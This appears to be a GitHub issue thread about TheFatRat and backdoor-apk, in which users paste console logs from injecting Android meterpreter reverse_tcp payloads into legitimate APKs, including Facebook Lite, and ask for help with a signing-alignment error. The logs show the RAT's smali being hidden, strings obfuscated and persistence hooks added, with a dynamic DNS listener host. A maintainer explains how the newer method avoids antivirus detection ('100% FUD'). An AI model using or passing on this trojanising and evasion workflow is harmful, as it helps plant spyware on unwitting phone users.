### ISSUE TITLE
[!] Failed to align recompiled APK

### ISSUE THREAD

**Issue by blackfalg** [Screetsec/TheFatRat#140]
[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++    ]
 +------------------------------+
 | [ 1 ] Use Backdoor-apk 0.2.2 |
 | [ 2 ] Use old Fatrat method  |
 +------------------------------+

 Select Tool to create apk : 1

[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$ 
  Generate Backdoor
  +------------++-------------------------++-----------------------+
  | Name       ||  Descript   	          || Your Input
  +------------++-------------------------++-----------------------+
  | LHOST      ||  The Listen Addres      || 192.168.0.111
  | LPORT      ||  The Listen Ports       || 4444
  | OUTPUTNAME ||  The Filename output    || app_backdoor.apk
  | PAYLOAD    ||  Payload To Be Used     || android/meterpreter/reverse_tcp
  +------------++-------------------------++-----------------------+

 
[*] Creating RAT Apk File...done.
 
[*] Decompiling RAT APK file...done.
 
[*] Decompiling original APK file...done.
 
[*] Merging permissions of original and payload projects...done.
 
[*] Running proguard on RAT APK file...done.
 
[*] Decompiling obfuscated RAT APK file...done.
 
[*] Creating new directories in original project for RAT smali files...done.
 
[*] Copying RAT smali files to new directories in original project...done.
 
[*] Fixing RAT smali files...done.
 
[*] Obfuscating const-string values in RAT smali files...done.
 
[*] Locating smali file to hook in original project...done.
 
[*] Adding hook in original smali file... 
done.
 
[*] Adding persistence hook in original project...done.
 
[*] Recompiling original project with backdoor...done.
date: invalid date ‘Sun Mar 03 05:23:22 2041’
 
[*] Generating RSA key for signing...done.
 
[*] Signing recompiled APK...done.
 
[*] Verifying signed artifacts...done.
 
[*] Aligning recompiled APK...done.
 [!] Failed to align recompiled APK****

This error appears when  use method 1 to create the payload pleas fix this the system is Kali GNU/Linux Rolling 32-bit 
thanks

**Comment by peterpt** [comment]
We did not build backdoor_apk , we implemented backdoor apk in fatrat .
Try it with original backdoor-apk at https://github.com/dana-at-cp/backdoor-apk
to see if you got the same issue .
If you still get the same error , then create an issue on original backdoor_apk github , so the main builder can give a look at it .

Most of these errors happen because you pick apks from everywhere on the web and expect backdoor_apk to build a rat on it .
You should read the readme file on fatrat .

Try it with option2 and select an hook point to see if you can build the apk .

If you want to build an apk just for testing on your device then use the msfvenom menu and select "android" on its submenu .

**Comment by blackfalg** [comment]
I want to ask you what is the difference between the first method and the second method is the style of payload encryption

thanks


Sent from Outlook<http://aka.ms/weboutlook>
________________________________

**Comment by blackfalg** [comment]
/ ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.2 on Wed Jun 14 08:05:45 EDT 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: blackfalg2017.ddns.net
[?] Please enter an LPORT value: 4444
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
date: invalid date ‘Sun Mar 03 05:23:22 2041’
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
[!] Failed to align recompiled APK



The same error appears in backdoor-apk.sh v0.2.2

what the proplem pls help

thanks


Sent from Outlook<http://aka.ms/weboutlook>
________________________________

**Comment by peterpt** [comment]
Fatrat old apk method is detected much more often by antivirus , this happens because old method creates a folder inside rat apk with the original name of the rat payload , which is : metasploit  , and because of this antivirus can detect it .
However , old method works differently from backdoor_apk , old method provides you hook points for you to choose in case the the main internal method fail to look for an hook to insert the payload .

Backdoor APK , creates a random name folder to put the payload inside the apk , this way it is much more difficult for antivirus to detect .

Consider backdoor_apk an 100% FUD , while at this moment old method is not FUD anymore .
We just leave the old method still active in fatrat because it provides alternatives points i case it fails , while backdoor_apk does not do that .

**Comment by rocky2496** [comment]
[ 1 ] Use Backdoor-apk 0.2.2 |
| [ 2 ] Use old Fatrat method |
+------------------------------+

Select Tool to create apk : 1

[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$
Generate Backdoor
+------------++-------------------------++-----------------------+
| Name || Descript || Your Input
+------------++-------------------------++-----------------------+
| LHOST || The Listen Addres || 192.168.0.111
| LPORT || The Listen Ports || 4444
| OUTPUTNAME || The Filename output || app_backdoor.apk
| PAYLOAD || Payload To Be Used || android/meterpreter/reverse_tcp
+------------++-------------------------++-----------------------+

[*] Creating RAT Apk File...done.

[*] Decompiling RAT APK file...done.

[*] Decompiling original APK file...done.

[*] Merging permissions of original and payload projects...done.

[*] Running proguard on RAT APK file...done.

[*] Decompiling obfuscated RAT APK file...done.

[*] Creating new directories in original project for RAT smali files...done.

[*] Copying RAT smali files to new directories in original project...done.

[*] Fixing RAT smali files...done.

[*] Obfuscating const-string values in RAT smali files...done.

[*] Locating smali file to hook in original project...done.

[*] Adding hook in original smali file...
done.

[*] Adding persistence hook in original project...done.

[*] Recompiling original project with backdoor...done.
date: invalid date ‘Sun Mar 03 05:23:22 2041’

[*] Generating RSA key for signing...done.

[*] Signing recompiled APK...done.

[*] Verifying signed artifacts...done.

[] Aligning recompiled APK...done.
[!] Failed to align recompiled APK***

**Comment by pickuphackerscall** [comment]
**🛑🛑🛑 Here is The FIX 2019..**  https://youtu.be/QfyYWioLEk4
Full Video by FirstClickin. Solved now file is Recompiling without Error

**Comment by steef98** [comment]
[*] Running backdoor-apk.sh v0.2.4a on Sal May 26 00:57:24 +03 2020
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[*] Decompiling original APK file...done.
[*] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/facebook/lite
[+] Smali file to hook RAT payload: com/facebook/lite/ClientApplicationSplittedShell.smali
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Injecting helpful Java classes in RAT APK file...done.
[*] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/facebook/lite/pyzaz
[+] Generated new smali class name for MainBroadcastReceiver.smali: Dqqee
[+] Generated new smali class name for MainService.smali: Vygdw
[+] Generated new smali class name for Payload.smali: Jtnwq
[+] Generated new smali class name for StringObfuscator.smali: Potxd
[+] Generated new smali method name for StringObfuscator.obfuscate method: njjbx
[+] Generated new smali method name for StringObfuscator.unobfuscate method: yszqz
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.

Warning:
The certificate uses the MD5withRSA signature algorithm which is considered a security risk.

Warning:
The certificate uses the MD5withRSA signature algorithm which is considered a security risk.
date: geçersiz tarih '`Mon Sep 26 00:52:16 2050''
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
[!] Failed to align recompiled APK

Press [ENTER] key to continue to return to fatrat menu

KAFAYI YİCEM DÜNE KADAR OLUYODU BU NOLUYO ABİ
